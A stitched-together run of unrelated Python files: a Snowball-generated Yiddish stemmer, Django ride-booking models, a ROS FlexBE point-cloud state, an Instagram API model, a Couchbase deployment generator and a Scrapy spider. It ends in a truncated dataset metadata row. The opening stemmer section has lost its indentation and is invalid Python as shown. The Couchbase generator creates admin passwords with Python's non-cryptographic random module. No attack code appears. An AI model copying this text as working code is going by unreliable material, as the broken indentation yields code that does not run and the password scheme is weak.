v_2 = self.cursor
try:
v_3 = self.cursor
try:
v_4 = self.cursor
try:
if not self.eq_s(u"\u05D2\u05E2\u05DC\u05D8"):
raise lab4()
raise lab3()
except lab4: pass
self.cursor = v_4
if not self.eq_s(u"\u05D2\u05E2\u05D1\u05E0"):
raise lab2()
except lab3: pass
self.cursor = v_3
raise lab1()
except lab2: pass
self.cursor = v_2
self.bra = self.cursor
if not self.eq_s(u"\u05D2\u05E2"):
self.cursor = v_1
raise lab0()
self.ket = self.cursor
if not self.slice_from(u"GE"):
return False
except lab1: pass
except lab0: pass
v_5 = self.cursor
try:
if self.find_among(YiddishStemmer.a_0) == 0:
self.cursor = v_5
raise lab5()
try:
v_6 = self.cursor
try:
v_7 = self.cursor
try:
v_8 = self.cursor
try:
if not self.eq_s(u"\u05E6\u05D5\u05D2\u05E0"):
raise lab9()
raise lab8()
except lab9: pass
self.cursor = v_8
try:
if not self.eq_s(u"\u05E6\u05D5\u05E7\u05D8"):
raise lab10()
raise lab8()
except lab10: pass
self.cursor = v_8
if not self.eq_s(u"\u05E6\u05D5\u05E7\u05E0"):
raise lab7()
except lab8: pass
if self.cursor < self.limit:
raise lab7()
self.cursor = v_7
raise lab6()
except lab7: pass
self.cursor = v_6
try:
v_9 = self.cursor
if not self.eq_s(u"\u05D2\u05E2\u05D1\u05E0"):
raise lab11()
self.cursor = v_9
raise lab6()
except lab11: pass
self.cursor = v_6
try:
self.bra = self.cursor
if not self.eq_s(u"\u05D2\u05E2"):
raise lab12()
self.ket = self.cursor
if not self.slice_from(u"GE"):
return False
raise lab6()
except lab12: pass
self.cursor = v_6
self.bra = self.cursor
if not self.eq_s(u"\u05E6\u05D5"):
self.cursor = v_5
raise lab5()
self.ket = self.cursor
if not self.slice_from(u"TSU"):
return False
except lab6: pass
except lab5: pass
v_10 = self.cursor
c = self.cursor + 3
if c > self.limit:
return False
self.cursor = c
self.I_x = self.cursor
self.cursor = v_10
v_11 = self.cursor
try:
if self.find_among(YiddishStemmer.a_1) == 0:
self.cursor = v_11
raise lab13()
except lab13: pass
v_12 = self.cursor
try:
if not self.in_grouping(YiddishStemmer.g_consonant, 1489, 1520):
raise lab14()
if not self.in_grouping(YiddishStemmer.g_consonant, 1489, 1520):
raise lab14()
if not self.in_grouping(YiddishStemmer.g_consonant, 1489, 1520):
raise lab14()
self.I_p1 = self.cursor
return False
except lab14: pass
self.cursor = v_12
if not self.go_out_grouping(YiddishStemmer.g_vowel, 1488, 1522):
return False
while True:
try:
if not self.in_grouping(YiddishStemmer.g_vowel, 1488, 1522):
raise lab15()
continue
except lab15: pass
break
self.I_p1 = self.cursor
try:
if not self.I_p1 < self.I_x:
raise lab16()
self.I_p1 = self.I_x
except lab16: pass
return True
def __r_R1(self):
if not self.I_p1 <= self.cursor:
return False
return True
def __r_R1plus3(self):
if not self.I_p1 <= (self.cursor + 3):
return False
return True
def __r_standard_suffix(self):
v_1 = self.limit - self.cursor
try:
self.ket = self.cursor
among_var = self.find_among_b(YiddishStemmer.a_2)
if among_var == 0:
raise lab0()
self.bra = self.cursor
if among_var == 1:
if not self.__r_R1():
raise lab0()
if not self.slice_del():
return False
elif among_var == 2:
if not self.__r_R1():
raise lab0()
if not self.slice_from(u"\u05D9\u05E2"):
return False
elif among_var == 3:
if not self.__r_R1():
raise lab0()
if not self.slice_del():
return False
v_2 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05D2\u05D0\u05E0\u05D2"):
raise lab1()
self.bra = self.cursor
if not self.slice_from(u"\u05D2\u05F2"):
return False
raise lab0()
except lab1: pass
self.cursor = self.limit - v_2
v_3 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05E0\u05D5\u05DE"):
raise lab2()
self.bra = self.cursor
if not self.slice_from(u"\u05E0\u05E2\u05DE"):
return False
raise lab0()
except lab2: pass
self.cursor = self.limit - v_3
v_4 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05DE\u05D9\u05D8"):
raise lab3()
self.bra = self.cursor
if not self.slice_from(u"\u05DE\u05F2\u05D3"):
return False
raise lab0()
except lab3: pass
self.cursor = self.limit - v_4
v_5 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05D1\u05D9\u05D8"):
raise lab4()
self.bra = self.cursor
if not self.slice_from(u"\u05D1\u05F2\u05D8"):
return False
raise lab0()
except lab4: pass
self.cursor = self.limit - v_5
v_6 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05D1\u05D9\u05E1"):
raise lab5()
self.bra = self.cursor
if not self.slice_from(u"\u05D1\u05F2\u05E1"):
return False
raise lab0()
except lab5: pass
self.cursor = self.limit - v_6
v_7 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05F0\u05D9\u05D6"):
raise lab6()
self.bra = self.cursor
if not self.slice_from(u"\u05F0\u05F2\u05D6"):
return False
raise lab0()
except lab6: pass
self.cursor = self.limit - v_7
v_8 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05D8\u05E8\u05D9\u05D1"):
raise lab7()
self.bra = self.cursor
if not self.slice_from(u"\u05D8\u05E8\u05F2\u05D1"):
return False
raise lab0()
except lab7: pass
self.cursor = self.limit - v_8
v_9 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05DC\u05D9\u05D8"):
raise lab8()
self.bra = self.cursor
if not self.slice_from(u"\u05DC\u05F2\u05D8"):
return False
raise lab0()
except lab8: pass
self.cursor = self.limit - v_9
v_10 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05E7\u05DC\u05D9\u05D1"):
raise lab9()
self.bra = self.cursor
if not self.slice_from(u"\u05E7\u05DC\u05F2\u05D1"):
return False
raise lab0()
except lab9: pass
self.cursor = self.limit - v_10
v_11 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05E8\u05D9\u05D1"):
raise lab10()
self.bra = self.cursor
if not self.slice_from(u"\u05E8\u05F2\u05D1"):
return False
raise lab0()
except lab10: pass
self.cursor = self.limit - v_11
v_12 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05E8\u05D9\u05E1"):
raise lab11()
self.bra = self.cursor
if not self.slice_from(u"\u05E8\u05F2\u05E1"):
return False
raise lab0()
except lab11: pass
self.cursor = self.limit - v_12
v_13 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05E9\u05F0\u05D9\u05D2"):
raise lab12()
self.bra = self.cursor
if not self.slice_from(u"\u05E9\u05F0\u05F2\u05D2"):
return False
raise lab0()
except lab12: pass
self.cursor = self.limit - v_13
v_14 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05E9\u05DE\u05D9\u05E1"):
raise lab13()
self.bra = self.cursor
if not self.slice_from(u"\u05E9\u05DE\u05F2\u05E1"):
return False
raise lab0()
except lab13: pass
self.cursor = self.limit - v_14
v_15 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05E9\u05E0\u05D9\u05D8"):
raise lab14()
self.bra = self.cursor
if not self.slice_from(u"\u05E9\u05E0\u05F2\u05D3"):
return False
raise lab0()
except lab14: pass
self.cursor = self.limit - v_15
v_16 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05E9\u05E8\u05D9\u05D1"):
raise lab15()
self.bra = self.cursor
if not self.slice_from(u"\u05E9\u05E8\u05F2\u05D1"):
return False
raise lab0()
except lab15: pass
self.cursor = self.limit - v_16
v_17 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05D1\u05D5\u05E0\u05D3"):
raise lab16()
self.bra = self.cursor
if not self.slice_from(u"\u05D1\u05D9\u05E0\u05D3"):
return False
raise lab0()
except lab16: pass
self.cursor = self.limit - v_17
v_18 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05F0\u05D5\u05D8\u05E9"):
raise lab17()
self.bra = self.cursor
if not self.slice_from(u"\u05F0\u05D9\u05D8\u05E9"):
return False
raise lab0()
except lab17: pass
self.cursor = self.limit - v_18
v_19 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05D6\u05D5\u05E0\u05D2"):
raise lab18()
self.bra = self.cursor
if not self.slice_from(u"\u05D6\u05D9\u05E0\u05D2"):
return False
raise lab0()
except lab18: pass
self.cursor = self.limit - v_19
v_20 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05D8\u05E8\u05D5\u05E0\u05E7"):
raise lab19()
self.bra = self.cursor
if not self.slice_from(u"\u05D8\u05E8\u05D9\u05E0\u05E7"):
return False
raise lab0()
except lab19: pass
self.cursor = self.limit - v_20
v_21 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05E6\u05F0\u05D5\u05E0\u05D2"):
raise lab20()
self.bra = self.cursor
if not self.slice_from(u"\u05E6\u05F0\u05D9\u05E0\u05D2"):
return False
raise lab0()
except lab20: pass
self.cursor = self.limit - v_21
v_22 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05E9\u05DC\u05D5\u05E0\u05D2"):
raise lab21()
self.bra = self.cursor
if not self.slice_from(u"\u05E9\u05DC\u05D9\u05E0\u05D2"):
return False
raise lab0()
except lab21: pass
self.cursor = self.limit - v_22
v_23 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05D1\u05F1\u05D2"):
raise lab22()
self.bra = self.cursor
if not self.slice_from(u"\u05D1\u05F2\u05D2"):
return False
raise lab0()
except lab22: pass
self.cursor = self.limit - v_23
v_24 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05D4\u05F1\u05D1"):
raise lab23()
self.bra = self.cursor
if not self.slice_from(u"\u05D4\u05F2\u05D1"):
return False
raise lab0()
except lab23: pass
self.cursor = self.limit - v_24
v_25 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05E4\u05D0\u05E8\u05DC\u05F1\u05E8"):
raise lab24()
self.bra = self.cursor
if not self.slice_from(u"\u05E4\u05D0\u05E8\u05DC\u05D9\u05E8"):
return False
raise lab0()
except lab24: pass
self.cursor = self.limit - v_25
v_26 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05E9\u05D8\u05D0\u05E0"):
raise lab25()
self.bra = self.cursor
if not self.slice_from(u"\u05E9\u05D8\u05F2"):
return False
raise lab0()
except lab25: pass
self.cursor = self.limit - v_26
v_27 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"\u05E9\u05F0\u05F1\u05E8"):
raise lab26()
self.bra = self.cursor
if not self.slice_from(u"\u05E9\u05F0\u05E2\u05E8"):
return False
raise lab0()
except lab26: pass
self.cursor = self.limit - v_27
elif among_var == 4:
try:
v_28 = self.limit - self.cursor
try:
if not self.__r_R1():
raise lab28()
if not self.slice_del():
return False
raise lab27()
except lab28: pass
self.cursor = self.limit - v_28
if not self.slice_from(u"\u05D8"):
return False
except lab27: pass
self.ket = self.cursor
if not self.eq_s_b(u"\u05D1\u05E8\u05D0\u05DB"):
raise lab0()
v_29 = self.limit - self.cursor
try:
if not self.eq_s_b(u"\u05D2\u05E2"):
self.cursor = self.limit - v_29
raise lab29()
except lab29: pass
self.bra = self.cursor
                if not self.slice_from(u"\u05D1\u05E8\u05E2\u05E0\u05D2"):
                    return False
            elif among_var == 5:
                if not self.slice_from(u"\u05D2\u05F2"):
                    return False
            elif among_var == 6:
                if not self.slice_from(u"\u05E0\u05E2\u05DE"):
                    return False
            elif among_var == 7:
                if not self.slice_from(u"\u05E9\u05E8\u05F2\u05D1"):
                    return False
            elif among_var == 8:
                if not self.slice_from(u"\u05DE\u05F2\u05D3"):
                    return False
            elif among_var == 9:
                if not self.slice_from(u"\u05D1\u05F2\u05D8"):
                    return False
            elif among_var == 10:
                if not self.slice_from(u"\u05D1\u05F2\u05E1"):
                    return False
            elif among_var == 11:
                if not self.slice_from(u"\u05F0\u05F2\u05D6"):
                    return False
            elif among_var == 12:
                if not self.slice_from(u"\u05D8\u05E8\u05F2\u05D1"):
                    return False
            elif among_var == 13:
                if not self.slice_from(u"\u05DC\u05F2\u05D8"):
                    return False
            elif among_var == 14:
                if not self.slice_from(u"\u05E7\u05DC\u05F2\u05D1"):
                    return False
            elif among_var == 15:
                if not self.slice_from(u"\u05E8\u05F2\u05D1"):
                    return False
            elif among_var == 16:
                if not self.slice_from(u"\u05E8\u05F2\u05E1"):
                    return False
            elif among_var == 17:
                if not self.slice_from(u"\u05E9\u05F0\u05F2\u05D2"):
                    return False
            elif among_var == 18:
                if not self.slice_from(u"\u05E9\u05DE\u05F2\u05E1"):
                    return False
            elif among_var == 19:
                if not self.slice_from(u"\u05E9\u05E0\u05F2\u05D3"):
                    return False
            elif among_var == 20:
                if not self.slice_from(u"\u05D1\u05D9\u05E0\u05D3"):
                    return False
            elif among_var == 21:
                if not self.slice_from(u"\u05F0\u05D9\u05D8\u05E9"):
                    return False
            elif among_var == 22:
                if not self.slice_from(u"\u05D6\u05D9\u05E0\u05D2"):
                    return False
            elif among_var == 23:
                if not self.slice_from(u"\u05D8\u05E8\u05D9\u05E0\u05E7"):
                    return False
            elif among_var == 24:
                if not self.slice_from(u"\u05E6\u05F0\u05D9\u05E0\u05D2"):
                    return False
            elif among_var == 25:
                if not self.slice_from(u"\u05E9\u05DC\u05D9\u05E0\u05D2"):
                    return False
            elif among_var == 26:
                if not self.slice_from(u"\u05D1\u05F2\u05D2"):
                    return False
            elif among_var == 27:
                if not self.slice_from(u"\u05D4\u05F2\u05D1"):
                    return False
            elif among_var == 28:
                if not self.slice_from(u"\u05E4\u05D0\u05E8\u05DC\u05D9\u05E8"):
                    return False
            elif among_var == 29:
                if not self.slice_from(u"\u05E9\u05D8\u05F2"):
                    return False
            elif among_var == 30:
                if not self.slice_from(u"\u05E9\u05F0\u05E2\u05E8"):
                    return False
            elif among_var == 31:
                if not self.slice_from(u"\u05D1\u05E8\u05E2\u05E0\u05D2"):
                    return False
            elif among_var == 32:
                if not self.__r_R1():
                    raise lab0()
                if not self.slice_from(u"\u05D4"):
                    return False
            elif among_var == 33:
                try:
                    v_30 = self.limit - self.cursor
                    try:
                        try:
                            v_31 = self.limit - self.cursor
                            try:
                                if not self.eq_s_b(u"\u05D2"):
                                    raise lab33()
                                raise lab32()
                            except lab33: pass
                            self.cursor = self.limit - v_31
                            if not self.eq_s_b(u"\u05E9"):
                                raise lab31()
                        except lab32: pass
                        v_32 = self.limit - self.cursor
                        try:
                            if not self.__r_R1plus3():
                                self.cursor = self.limit - v_32
                                raise lab34()
                            if not self.slice_from(u"\u05D9\u05E1"):
                                return False
                        except lab34: pass
                        raise lab30()
                    except lab31: pass
                    self.cursor = self.limit - v_30
                    if not self.__r_R1():
                        raise lab0()
                    if not self.slice_del():
                        return False
                except lab30: pass
        except lab0: pass
        self.cursor = self.limit - v_1
        v_33 = self.limit - self.cursor
        try:
            self.ket = self.cursor
            among_var = self.find_among_b(YiddishStemmer.a_3)
            if among_var == 0:
                raise lab35()
            self.bra = self.cursor
            if among_var == 1:
                if not self.__r_R1():
                    raise lab35()
                if not self.slice_del():
                    return False
            else:
                if not self.__r_R1():
                    raise lab35()
                if not self.in_grouping_b(YiddishStemmer.g_consonant, 1489, 1520):
                    raise lab35()
                if not self.slice_del():
                    return False
        except lab35: pass
        self.cursor = self.limit - v_33
        v_34 = self.limit - self.cursor
        try:
            self.ket = self.cursor
            among_var = self.find_among_b(YiddishStemmer.a_4)
            if among_var == 0:
                raise lab36()
            self.bra = self.cursor
            if among_var == 1:
                if not self.__r_R1():
                    raise lab36()
                if not self.slice_del():
                    return False
        except lab36: pass
        self.cursor = self.limit - v_34
        v_35 = self.limit - self.cursor
        try:
            while True:
                v_36 = self.limit - self.cursor
                try:
                    try:
                        while True:
                            v_37 = self.limit - self.cursor
                            try:
                                self.ket = self.cursor
                                try:
                                    v_38 = self.limit - self.cursor
                                    try:
                                        if not self.eq_s_b(u"GE"):
                                            raise lab42()
                                        raise lab41()
                                    except lab42: pass
                                    self.cursor = self.limit - v_38
                                    if not self.eq_s_b(u"TSU"):
                                        raise lab40()
                                except lab41: pass
                                self.bra = self.cursor
                                if not self.slice_del():
                                    return False
                                self.cursor = self.limit - v_37
                                raise lab39()
                            except lab40: pass
                            self.cursor = self.limit - v_37
                            if self.cursor <= self.limit_backward:
                                raise lab38()
                            self.cursor -= 1
                    except lab39: pass
                    continue
                except lab38: pass
                self.cursor = self.limit - v_36
                break
        except lab37: pass
        self.cursor = self.limit - v_35
        return True
    def _stem(self):
        self.__r_prelude()
        v_2 = self.cursor
        self.__r_mark_regions()
        self.cursor = v_2
        self.limit_backward = self.cursor
        self.cursor = self.limit
        self.__r_standard_suffix()
        self.cursor = self.limit_backward
        return True

class lab0(BaseException): pass
class lab1(BaseException): pass
class lab2(BaseException): pass
class lab3(BaseException): pass
class lab4(BaseException): pass
class lab5(BaseException): pass
class lab6(BaseException): pass
class lab7(BaseException): pass
class lab8(BaseException): pass
class lab9(BaseException): pass
class lab10(BaseException): pass
class lab11(BaseException): pass
class lab12(BaseException): pass
class lab13(BaseException): pass
class lab14(BaseException): pass
class lab15(BaseException): pass
class lab16(BaseException): pass
class lab17(BaseException): pass
class lab18(BaseException): pass
class lab19(BaseException): pass
class lab20(BaseException): pass
class lab21(BaseException): pass
class lab22(BaseException): pass
class lab23(BaseException): pass
class lab24(BaseException): pass
class lab25(BaseException): pass
class lab26(BaseException): pass
class lab27(BaseException): pass
class lab28(BaseException): pass
class lab29(BaseException): pass
class lab30(BaseException): pass
class lab31(BaseException): pass
class lab32(BaseException): pass
class lab33(BaseException): pass
class lab34(BaseException): pass
class lab35(BaseException): pass
class lab36(BaseException): pass
class lab37(BaseException): pass
class lab38(BaseException): pass
class lab39(BaseException): pass
class lab40(BaseException): pass
class lab41(BaseException): pass
class lab42(BaseException): pass
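
The `labN` exception classes above are jump targets: the Snowball compiler translates its structured "goto" control flow into `raise labN()` / `except labN: pass` pairs, so a raise anywhere inside the nested matching code jumps straight to the matching handler. A minimal, hypothetical sketch of that pattern (not part of the generated file):

```python
# Sketch of the Snowball "label as exception" idiom used by the generated
# stemmer: raising lab_fail jumps past the current alternative, emulating
# a forward goto inside deeply nested matching code.

class lab_fail(BaseException):
    """Jump target: abandon the current alternative."""
    pass


def strip_prefix(word, prefixes):
    """Return word with the first matching prefix removed, else unchanged."""
    for prefix in prefixes:
        try:
            if not word.startswith(prefix):
                raise lab_fail()      # "goto": skip this alternative
            return word[len(prefix):]
        except lab_fail:
            pass                      # fall through to the next prefix
    return word
```

Deriving from `BaseException` rather than `Exception` keeps these control-flow jumps from being swallowed by ordinary `except Exception:` handlers in user code.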

# ---------------------------------------------------------------------------
# File: bookingapp/models.py  (repo: bhargava-kush/dj_uber, license: MIT)
# ---------------------------------------------------------------------------
from django.db import models
from phonenumber_field.modelfields import PhoneNumberField

from dj_uber.users.models import User


class Location(models.Model):
    TYPES = (
        ('CURRENT', 'current'),
        ('DESTINATION', 'destination'),
    )

    longitude = models.CharField(max_length=10)
    latitude = models.CharField(max_length=10)
    location_name = models.CharField(max_length=70)
    type = models.CharField(choices=TYPES, max_length=20)

    def __unicode__(self):
        return self.location_name

    def __str__(self):
        return self.location_name

    class Meta:
        verbose_name_plural = "Locations"


class Passenger(models.Model):
    user = models.OneToOneField(User, on_delete=models.CASCADE, related_name='passenger')
    phone_number = PhoneNumberField(null=True, blank=True)
    current_location = models.ForeignKey('Location', related_name='passenger_current_location',
                                         on_delete=models.CASCADE, null=True, blank=True)
    destination_location = models.ForeignKey('Location', related_name='passenger_destination_location',
                                             on_delete=models.CASCADE, null=True, blank=True)
    is_searching = models.BooleanField(default=False)

    def __unicode__(self):
        return self.user.email

    def __str__(self):
        return self.user.email

    class Meta:
        verbose_name_plural = "Passengers"


class Driver(models.Model):
    user = models.OneToOneField(User, on_delete=models.CASCADE, related_name='driver')
    phone_number = PhoneNumberField(null=True, blank=True)
    cab_number_plate = models.CharField(max_length=20, null=True, blank=True)
    seats = models.CharField(max_length=2, null=True, blank=True)
    current_location = models.ForeignKey('Location', related_name='driver_current_location',
                                         on_delete=models.CASCADE, null=True, blank=True)

    def __unicode__(self):
        return self.user.email

    def __str__(self):
        return self.user.email

    class Meta:
        verbose_name_plural = "Drivers"


class Trip(models.Model):
    TRIP_STATUS = (
        ('IS_ACTIVE', 'is_active'),
        ('IS_CANCELED', 'is_cancelled'),
        ('FINISHED', 'finished'),
    )

    status = models.CharField(choices=TRIP_STATUS, max_length=20)
    passenger = models.ForeignKey('Passenger', on_delete=models.CASCADE, null=True, blank=True)
    driver = models.ForeignKey('Driver', on_delete=models.CASCADE, null=True, blank=True)
    date = models.DateField(auto_now=True)
    start_location = models.ForeignKey('Location', related_name='start_location',
                                       on_delete=models.CASCADE, null=True, blank=True)
    end_location = models.ForeignKey('Location', related_name='end_location',
                                     on_delete=models.CASCADE, null=True, blank=True)

    def __unicode__(self):
        return self.passenger.user.email

    def __str__(self):
        return self.passenger.user.email

    class Meta:
        verbose_name_plural = "Trips"
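
Django `choices` tuples such as `TRIP_STATUS` above store the first element of each pair in the database and keep the second as the human-readable label. The lookup behaviour can be illustrated with plain Python, no Django required (a small sketch, not part of the app):

```python
# choices tuples are (stored_value, human_label) pairs; wrapping them in
# dict() gives a stored-value -> label lookup, which is roughly what
# Django's get_FOO_display() does for a model instance.
TRIP_STATUS = (
    ('IS_ACTIVE', 'is_active'),
    ('IS_CANCELED', 'is_cancelled'),
    ('FINISHED', 'finished'),
)

labels = dict(TRIP_STATUS)
```

Because only the stored value ends up in the database, renaming a label later is cheap, while renaming a stored value requires a data migration.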

# ---------------------------------------------------------------------------
# File: armada_flexbe_states/src/armada_flexbe_states/concatenate_pointcloud_service_state.py
# (repo: uml-robotics/armada_behaviors, license: BSD-3-Clause)
# ---------------------------------------------------------------------------
#!/usr/bin/env python
import rospy

from flexbe_core import EventState, Logger
from flexbe_core.proxy import ProxyServiceCaller
from sensor_msgs.msg import PointCloud2
from armada_flexbe_utilities.srv import ConcatenatePointCloud, ConcatenatePointCloudResponse, ConcatenatePointCloudRequest


class concatenatePointCloudState(EventState):
    '''
    Concatenates a list of PointCloud2 messages into a single cloud by
    calling the /concatenate_pointcloud service.

    ># pointcloud_list       List of PointCloud2 messages
    #> combined_pointcloud   Concatenated PointCloud2 message

    <= continue              Concatenated pointclouds successfully
    <= failed                Something went wrong
    '''

    def __init__(self):
        # Declare outcomes, input_keys, and output_keys by calling the
        # super constructor with the corresponding arguments.
        super(concatenatePointCloudState, self).__init__(outcomes=['continue', 'failed'],
                                                         input_keys=['pointcloud_list'],
                                                         output_keys=['combined_pointcloud'])

    def execute(self, userdata):
        # This method is called periodically while the state is active.
        # Its main purpose is to check state conditions and trigger a
        # corresponding outcome. If no outcome is returned, the state stays active.
        self._service_topic = '/concatenate_pointcloud'
        rospy.wait_for_service(self._service_topic)
        self._service = ProxyServiceCaller({self._service_topic: ConcatenatePointCloud})

        try:
            service_response = self._service.call(self._service_topic, userdata.pointcloud_list)
            userdata.combined_pointcloud = service_response.cloud_out
            return 'continue'
        except Exception:
            return 'failed'

    def on_enter(self, userdata):
        # Called when the state becomes active, i.e. a transition from another
        # state to this one is taken. Primarily used to start actions
        # associated with this state.
        Logger.loginfo('attempting to concatenate pointcloud...')

    def on_exit(self, userdata):
        # Called when an outcome is returned and another state gets active.
        # Can be used to stop possibly running processes started by on_enter.
        pass  # Nothing to do in this state.

    def on_start(self):
        # Called when the behavior is started. If possible, it is generally
        # better to initialize used resources in the constructor, because if
        # anything failed, the behavior would not even be started.
        pass  # Nothing to do in this state.

    def on_stop(self):
        # Called whenever the behavior stops execution, also if it is
        # cancelled. Use this event to clean up things like claimed resources.
        pass  # Nothing to do in this state.

# ---------------------------------------------------------------------------
# File: instagram_api/response/model/user_presence.py
# (repo: Yuego/instagram_api, license: MIT)
# ---------------------------------------------------------------------------
from ..mapper import PropertyMapper, ApiInterfaceBase
from ..mapper.types import Timestamp, AnyType

__all__ = ['UserPresence', 'UserPresenceInterface']


class UserPresenceInterface(ApiInterfaceBase):
    user_id: int
    last_activity_at_ms: str
    is_active: bool
    in_threads: [str]


class UserPresence(PropertyMapper, UserPresenceInterface):
    pass

# ---------------------------------------------------------------------------
# File: marketplace/couchbase-hourly-pricing.py
# (repo: couchbase-partners/couchbase-google-deployment-manager, license: Apache-2.0)
# ---------------------------------------------------------------------------
import naming

def GenerateConfig(context):
    license = 'hourly-pricing'

    config = {}
    config['resources'] = []
    config['outputs'] = []

    couchbaseUsername = 'couchbase'
    couchbasePassword = GeneratePassword()

    config['outputs'].append({
        'name': 'couchbaseUsername',
        'value': couchbaseUsername
    })
    config['outputs'].append({
        'name': 'couchbasePassword',
        'value': couchbasePassword
    })

    clusters = GetClusters(context)
    deployment = {
        'name': 'deployment',
        'type': 'deployment.py',
        'properties': {
            'serverVersion': context.properties['serverVersion'],
            'syncGatewayVersion': context.properties['syncGatewayVersion'],
            'couchbaseUsername': couchbaseUsername,
            'couchbasePassword': couchbasePassword,
            'license': license,
            'clusters': clusters
        }
    }
    config['resources'].append(deployment)

    for cluster in clusters:
        clusterName = cluster['cluster']
        for group in cluster['groups']:
            outputName = naming.ExternalIpOutputName(clusterName, group['group'])
            config['outputs'].append({
                'name': outputName,
                'value': '$(ref.deployment.%s)' % outputName
            })

    return config


def GetClusters(context):
    clusters = []
    regions = GetRegionsList(context)
    for region in regions:
        cluster = {
            'cluster': region,
            'region': region,
            'groups': [
                {
                    'group': 'server',
                    'diskSize': context.properties['serverDiskSize'],
                    'nodeCount': context.properties['serverNodeCount'],
                    'nodeType': context.properties['serverNodeType'],
                    'services': ['data', 'query', 'index', 'fts', 'eventing', 'analytics']
                }
            ]
        }
        if context.properties['syncGatewayNodeCount'] > 0:
            cluster['groups'].append({
                'group': 'syncgateway',
                'diskSize': context.properties['syncGatewayDiskSize'],
                'nodeCount': context.properties['syncGatewayNodeCount'],
                'nodeType': context.properties['syncGatewayNodeType'],
                'services': ['syncGateway']
            })
        clusters.append(cluster)
    return clusters


def GetRegionsList(context):
    regions = []
    availableRegions = [
        'us-central1',
        'us-west1',
        'us-east1',
        'us-east4',
        'europe-west1',
        'europe-west2',
        'europe-west3',
        'asia-southeast1',
        'asia-east1',
        'asia-northeast1',
        'australia-southeast1'
    ]
    for region in availableRegions:
        if context.properties[region]:
            regions.append(region)
    return regions


def GeneratePassword():
    import random
    categories = ['ABCDEFGHJKLMNPQRSTUVWXYZ', 'abcdefghijkmnopqrstuvwxyz', '123456789', '*-+.']
    password = []
    for category in categories:
        password.insert(random.randint(0, len(password)), random.choice(category))
    while len(password) < 8:
        password.insert(random.randint(0, len(password)), random.choice(''.join(categories)))
    return ''.join(password)
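
`GeneratePassword` guarantees one character from each category before padding to eight characters, so every password contains an uppercase letter, a lowercase letter, a digit, and a symbol. A stand-alone copy of the scheme (a sketch duplicating the logic above so it can be tested in isolation) makes those properties easy to verify:

```python
import random

# Stand-alone copy of the password scheme used above: insert one character
# from each category at a random position, then pad with random characters
# drawn from all categories until the password is 8 characters long.
CATEGORIES = ['ABCDEFGHJKLMNPQRSTUVWXYZ', 'abcdefghijkmnopqrstuvwxyz',
              '123456789', '*-+.']


def generate_password():
    password = []
    for category in CATEGORIES:
        password.insert(random.randint(0, len(password)), random.choice(category))
    while len(password) < 8:
        password.insert(random.randint(0, len(password)),
                        random.choice(''.join(CATEGORIES)))
    return ''.join(password)
```

Note the alphabets deliberately omit lookalike characters (`I`, `O`, `l`, `0`) to avoid transcription mistakes.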

# ---------------------------------------------------------------------------
# File: scraper/storage_spiders/myphamsachcomvn.py
# (repo: chongiadung/choinho, license: MIT)
# ---------------------------------------------------------------------------
# Auto generated by generator.py. Delete this line if you make modification.
from scrapy.spiders import Rule
from scrapy.linkextractors import LinkExtractor

XPATH = {
    'name': "//div[@id='page']/div[2]/table/tbody/tr/td[3]/table[1]/tbody/tr[2]/td[2]/table/tbody/tr/td[2]/h1",
    'price': "//div[@id='page']/div[2]/table/tbody/tr/td[3]/table[@class='psub'][2]/tbody/tr[2]/td[3]/strong/font",
    'category': "//div[@class='address']/a[7]",
    'description': "//tbody/tr[2]/td[2]/table/tbody/tr/td[2]",
    'images': "//td[@class='psub']/div[1]/a[@class='thickbox']/img/@src",
    'canonical': "",
    'base_url': "",
    'brand': ""
}
name = 'myphamsach.com.vn'
allowed_domains = ['myphamsach.com.vn']
start_urls = ['http://myphamsach.com.vn/']
tracking_url = ''
sitemap_urls = ['']
sitemap_rules = [('', 'parse_item')]
sitemap_follow = []
rules = [
    Rule(LinkExtractor(allow=['/[a-zA-Z0-9-]+_product_\d+_\d+.html']), 'parse_item'),
    Rule(LinkExtractor(allow=['/[a-zA-Z0-9-]+_product_\d+.html']), 'parse'),
    # Rule(LinkExtractor(), 'parse_item_and_links'),
]
fe85a27cc7c59903b98ab16f4d4c18e1b831b70b | 157 | py | Python | curso/PY2/for/ex5.py | smrsassa/Studying-Python | a5acbce42b85bdd6aea8058ca323fbbd12ce5c22 | [
"MIT"
] | 1 | 2019-10-21T18:19:13.000Z | 2019-10-21T18:19:13.000Z | curso/PY2/for/ex5.py | smrsassa/Studying-python | a5acbce42b85bdd6aea8058ca323fbbd12ce5c22 | [
"MIT"
] | null | null | null | curso/PY2/for/ex5.py | smrsassa/Studying-python | a5acbce42b85bdd6aea8058ca323fbbd12ce5c22 | [
